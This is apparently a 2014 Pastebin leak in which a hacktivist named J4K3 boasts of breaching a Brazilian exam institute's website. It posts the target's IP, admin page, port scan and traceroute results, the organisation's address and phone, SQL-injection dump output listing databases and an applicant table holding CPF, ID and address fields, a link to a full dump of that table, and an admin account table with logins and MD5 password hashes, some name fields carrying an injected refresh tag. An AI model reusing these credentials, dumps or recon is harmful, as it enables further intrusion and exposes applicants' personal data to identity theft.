J4K3

Doc of www.institutomachadodeassis.com.br by J4K3

Jun 15th, 2014
358
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.88 KB | None | 0 0
  1. Supporting: #OPHackingCup #OPWorldCup
  2. #FIFAGoHome
  3.  
  4. Target: http://www.institutomachadodeassis.com.br/
  5. IP: 187.17.98.153
  6. Admin page: http://www.institutomachadodeassis.com.br/admin/
  7.  
  8. open port 21/tcp
  9. open port 80/tcp
  10. open port 443/tcp
  11. open port 22/tcp
  12.  
  13. Info:
  14. 21/tcp open ftp Pure-FTPd
  15. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  16. | ssh-hostkey:
  17. | 1024 c0:3d:57:b8:4d:f0:8f:0d:b4:e0:0e:fb:27:c6:48:60 (DSA)
  18. |_ 2048 a0:01:d3:d3:9d:b4:ed:65:cb:5c:5c:c3:24:d9:68:28 (RSA)
  19. 80/tcp open http nginx
  20. |_http-methods: No Allow or Public header in OPTIONS response (status code 302)
  21. | http-title: Instituto Machado de Assis
  22. |_Requested resource was /concursos-arquivos
  23. 443/tcp open http nginx
  24. |_http-methods: No Allow or Public header in OPTIONS response (status code 400)
  25. |_http-title: 400 The plain HTTP request was sent to HTTPS port
  26. | ssl-cert: Subject: commonName=*.sslblindado.com/organizationName=Universo Online SA/stateOrProvinceName=Sao Paulo/countryName=BR
  27. | Issuer: commonName=GeoTrust SSL CA/organizationName=GeoTrust, Inc./countryName=US
  28. | Public Key type: rsa
  29. | Public Key bits: 2048
  30. | Not valid before: 2013-10-30T07:55:42+00:00
  31. | Not valid after: 2014-10-27T09:33:25+00:00
  32. | MD5: ceb6 4d64 57ac d315 d1a5 e9d7 b777 f116
  33. |_SHA-1: 5685 f532 e8dc a848 4238 021a dce9 d95a 9b57 5001
  34. |_ssl-date: 2014-06-14T20:44:45+00:00; -1s from local time.
  35. | sslv2:
  36. | SSLv2 supported
  37. | ciphers:
  38. | SSL2_DES_192_EDE3_CBC_WITH_MD5
  39. | SSL2_RC2_CBC_128_CBC_WITH_MD5
  40. | SSL2_RC4_128_WITH_MD5
  41. | SSL2_DES_64_CBC_WITH_MD5
  42. | SSL2_RC2_CBC_128_CBC_WITH_MD5
  43. |_ SSL2_RC4_128_EXPORT40_WITH_MD5
  44.  
  45. OS: Linux
  46.  
  47. TRACEROUTE (using port 5900):
  48.  
  49. Broadcom.Home (192.168.1.1)
  50. 200-217-90-96.host.telemar.net.br (200.217.90.96)
  51. xe-6-1-0.0-hga-mg-rotn-j01.telemar.net.br (200.164.13.121)
  52. so-10-1-0.0-vlm-sp-rotn-j01.telemar.net.br (200.223.45.153)
  53. 200.223.46.165
  54. 186.234.26.49
  55. 200-147-26-6.static.uol.com.br (200.147.26.6)
  56. www.institutomachadodeassis.com.br (187.17.98.153)
  57.  
  58. Adress: Rua Anísio de Abreu, nº 1740, Bairro Marquês, Teresina/PI, CEP 64.003-485
  59. Phone: (86) 9986-7981
  60.  
  61. SQL:
  62.  
  63. web application technology: Apache
  64. back-end DBMS: MySQL 5.0.11
  65.  
  66. available databases [2]:
  67. [*] information_schema
  68. [*] institutom87
  69.  
  70. Database: institutom87
  71. [28 tables]
  72. +---------------------+
  73. | cadastros |
  74. | cargos |
  75. | cms_albums |
  76. | cms_avisos |
  77. | cms_campanhas |
  78. | cms_catpublicidades |
  79. | cms_comentarios |
  80. | cms_conteudo_fotos |
  81. | cms_conteudos |
  82. | cms_editais |
  83. | cms_edital_arquivos |
  84. | cms_eventos |
  85. | cms_faq |
  86. | cms_fotos |
  87. | cms_mensagens |
  88. | cms_noticia_fotos |
  89. | cms_noticia_links |
  90. | cms_noticias |
  91. | cms_publicidades |
  92. | cms_usuarios |
  93. | cms_videos |
  94. | concursos |
  95. | config |
  96. | log |
  97. | permissoes |
  98. | sqlmapfile |
  99. | usuarios |
  100. | usuarios_perm |
  101. +---------------------+
  102.  
  103. Database: institutom87
  104. Table: cadastros
  105. [33 columns]
  106. +--------------------+------------------------+
  107. | Column | Type |
  108. +--------------------+------------------------+
  109. | arquivo_baixa | varchar(50) |
  110. | bairro | varchar(40) |
  111. | cep | varchar(8) |
  112. | cidade | varchar(40) |
  113. | cod_cadastro | int(10) unsigned |
  114. | cod_cargo | int(10) unsigned |
  115. | cod_concurso | int(10) unsigned |
  116. | cod_usuario | int(10) unsigned |
  117. | complemento | varchar(40) |
  118. | cpf | varchar(11) |
  119. | data_alteracao | datetime |
  120. | data_cadastro | datetime |
  121. | data_credito | date |
  122. | data_pagamento | date |
  123. | data_registro | datetime |
  124. | data_vencimento | date |
  125. | ddd | varchar(2) |
  126. | deficiencia | varchar(1) |
  127. | email | varchar(100) |
  128. | endereco | varchar(60) |
  129. | estado | varchar(2) |
  130. | estado_civil | varchar(10) |
  131. | identidade | varchar(15) |
  132. | nascimento | date |
  133. | necessidades | varchar(4) |
  134. | nome | varchar(50) |
  135. | numero | varchar(10) |
  136. | orgao_expedidor | varchar(10) |
  137. | sexo | varchar(1) |
  138. | telefone | varchar(10) |
  139. | uf_orgao_expedidor | varchar(2) |
  140. | valor | decimal(10,2) unsigned |
  141. | valor_pago | decimal(10,2) unsigned |
  142. +--------------------+------------------------+
  143.  
  144. Full data from the table 'cadatros': https://cdn.anonfiles.com/1402829880844.txt
  145.  
  146. Database: institutom87
  147. Table: usuarios
  148. [10 columns]
  149. +----------------+------------------+
  150. | Column | Type |
  151. +----------------+------------------+
  152. | administrador | bit(1) |
  153. | cod_usuario | int(10) unsigned |
  154. | data_alteracao | datetime |
  155. | ddd | varchar(2) |
  156. | email | varchar(50) |
  157. | login | varchar(20) |
  158. | nome | varchar(50) |
  159. | senha | varchar(32) |
  160. | status | bit(1) |
  161. | telefone | varchar(10) |
  162. +----------------+------------------+
  163.  
  164. Database: institutom87
  165. Table: usuarios
  166. [10 entries]
  167. +----------------------------------------------------+----------------------------------+------------+----------------------------------------+---------------+
  168. | nome | senha | login | email | administrador |
  169. +----------------------------------------------------+----------------------------------+------------+----------------------------------------+---------------+
  170. | Leandro Sales Lima | <blank> | admin | [email protected] | \x01 |
  171. | Leandro Sales Lima | \x03 | leandro | [email protected] | \x01 |
  172. | <META HTTP-EQUIV=0x52656672657368 CONTENT=0x313B55 | <blank> | fffffff | [email protected] | \x01 |
  173. | <META HTTP-EQUIV=0x52656672657368 CONTENT=0x313B55 | <blank> | elmira | [email protected] | \x01 |
  174. | <META HTTP-EQUIV=0x52656672657368 CONTENT=0x313B55 | <blank> | wernnes | [email protected] | \x01 |
  175. | <META HTTP-EQUIV=0x52656672657368 CONTENT=0x313B55 | <blank> | edimasa | [email protected] | \x01 |
  176. | <META HTTP-EQUIV=0x52656672657368 CONTENT=0x313B55 | dba750ac88adb8a02ab80b4f97b5c5e0 | machado | [email protected] | \x01 |
  177. | <META HTTP-EQUIV=0x52656672657368 CONTENT=0x313B55 | <blank> | professora | [email protected] | \x01 |
  178. | <META HTTP-EQUIV=0x52656672657368 CONTENT=0x313B55 | 6c50c078a664c110d4dd02251c7f9969 | fvsefves | [email protected] | \x01 |
  179. | <META HTTP-EQUIV=0x52656672657368 CONTENT=0x313B55 | 7e04a8fd784a6877edab5e2c15db628e | gndrsa | [email protected] | \x00 |
  180. +----------------------------------------------------+----------------------------------+------------+----------------------------------------+---------------+
  181.  
  182. Nobody have complete sec...
  183.  
  184. Hacked by J4K3 - Grey Hat - ©2011-2014
Add Comment
Please, Sign In to add comment